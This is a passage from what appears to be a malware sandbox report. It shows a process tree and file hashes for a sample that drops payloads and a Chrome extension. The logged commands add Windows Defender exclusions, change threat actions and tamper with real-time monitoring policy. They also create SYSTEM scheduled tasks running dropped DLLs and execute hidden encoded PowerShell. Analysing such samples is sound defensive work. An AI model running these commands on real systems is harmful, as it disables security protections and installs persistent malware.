                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:2764
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:2240
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1484
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BLxKwlsvgycOtcGgzTR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1788
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BLxKwlsvgycOtcGgzTR" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1704
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OSXovakinWMKC" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1332
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OSXovakinWMKC" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2188
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YCXTaorKmfUn" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1336
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YCXTaorKmfUn" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2752
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkliFOiDrNJU2" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:2612
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkliFOiDrNJU2" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:2648
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpguEeVzU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2516
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpguEeVzU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2804
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kyGmhDrgQBsTgrVB" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2132
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kyGmhDrgQBsTgrVB" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2304
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:2808
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:2220
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1680
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:788
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:1228
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2000
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "gVEExDRVJ" /SC once /ST 01:17:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        3⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:2624
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "gVEExDRVJ"
                                                                        3⤵
                                                                          PID:2252
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gVEExDRVJ"
                                                                          3⤵
                                                                            PID:2912
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2276
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2832
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2052
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                              4⤵
                                                                                PID:1048
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /CREATE /TN "OzZySrMPGtolFpNuu" /SC once /ST 02:20:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YQhqHXZBhguGrggk\wjTwyQEiNNQSPAi\txWYewF.exe\" S4 /gyeldidlE 525403 /S" /V1 /F
                                                                              3⤵
                                                                              • Drops file in Windows directory
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:1592
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /run /I /tn "OzZySrMPGtolFpNuu"
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1260
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 592
                                                                              3⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              PID:1396
                                                                          • C:\Windows\Temp\YQhqHXZBhguGrggk\wjTwyQEiNNQSPAi\txWYewF.exe
                                                                            C:\Windows\Temp\YQhqHXZBhguGrggk\wjTwyQEiNNQSPAi\txWYewF.exe S4 /gyeldidlE 525403 /S
                                                                            2⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops Chrome extension
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1860
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1776
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                • Indirect Command Execution
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1532
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2672
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:2520
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2412
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2456
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      6⤵
                                                                                        PID:1084
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2700
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                        PID:284
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          6⤵
                                                                                            PID:1512
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                        4⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:572
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1708
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                            6⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:684
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        4⤵
                                                                                        • Indirect Command Execution
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2268
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1480
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2264
                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                              7⤵
                                                                                                PID:2176
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bdWlhxaDpnKLPtrOII"
                                                                                        3⤵
                                                                                          PID:1560
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1816
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:3060
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3016
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1752
                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    7⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2596
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2648
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                5⤵
                                                                                                  PID:2604
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                    6⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2656
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      7⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2400
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qpguEeVzU\SJDnpu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FYmCHKEmyLJThKz" /V1 /F
                                                                                              3⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1704
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "FYmCHKEmyLJThKz2" /F /xml "C:\Program Files (x86)\qpguEeVzU\oYqlGOD.xml" /RU "SYSTEM"
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:3044
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /END /TN "FYmCHKEmyLJThKz"
                                                                                              3⤵
                                                                                                PID:872
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "FYmCHKEmyLJThKz"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1624
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "GZSQJFDIDylFqs" /F /xml "C:\Program Files (x86)\lkliFOiDrNJU2\ijcwtXc.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1480
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "mstsUZnzVQAHy2" /F /xml "C:\ProgramData\kyGmhDrgQBsTgrVB\AeUtUUO.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1652
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "pFUDdOlnRdzNJRHQL2" /F /xml "C:\Program Files (x86)\BLxKwlsvgycOtcGgzTR\wCoYdJi.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1484
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "oViCiMDFnFqbkTmVMhY2" /F /xml "C:\Program Files (x86)\OSXovakinWMKC\fnWvmZQ.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1560
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "CJkyJsCBKACMunqyE" /SC once /ST 02:43:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YQhqHXZBhguGrggk\LjMEaVyd\htuLnak.dll\",#1 /gdidkMU 525403" /V1 /F
                                                                                                3⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2212
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "CJkyJsCBKACMunqyE"
                                                                                                3⤵
                                                                                                  PID:3036
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "OzZySrMPGtolFpNuu"
                                                                                                  3⤵
                                                                                                    PID:2808
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1564
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Program crash
                                                                                                    PID:996
                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YQhqHXZBhguGrggk\LjMEaVyd\htuLnak.dll",#1 /gdidkMU 525403
                                                                                                  2⤵
                                                                                                    PID:2868
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YQhqHXZBhguGrggk\LjMEaVyd\htuLnak.dll",#1 /gdidkMU 525403
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2524
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "CJkyJsCBKACMunqyE"
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3024
                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                  taskeng.exe {95ABA4AE-7556-42FB-8367-53BCD19F66F4} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
                                                                                                  1⤵
                                                                                                    PID:2008
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1652
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:1748
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2580
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:2308
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:804
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:1152
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:1584
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:320
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:1736

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Program Files (x86)\BLxKwlsvgycOtcGgzTR\wCoYdJi.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                53ccbff9217d341b33d06128511f449b

                                                                                                                SHA1

                                                                                                                797ce376f6a675ebaafd9710a601e13e3df3b1d1

                                                                                                                SHA256

                                                                                                                d318b6402d91568fa5379ef36cf1bc84635b7460f544416fcf8e80ba6c6d3e07

                                                                                                                SHA512

                                                                                                                3b514768bacde160ecb328b53cab64de8842580f5f0d5c08ba4e5a5787229e989cbf7430e68b94282493b86e47dff4bfc730046c3dbd04f733628d1cc13dc79e

                                                                                                              • C:\Program Files (x86)\OSXovakinWMKC\fnWvmZQ.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                8946524527cc6a11c4ff1400a1e42085

                                                                                                                SHA1

                                                                                                                a8c0aff887c16e78ffb90c831db21cf38f453f1b

                                                                                                                SHA256

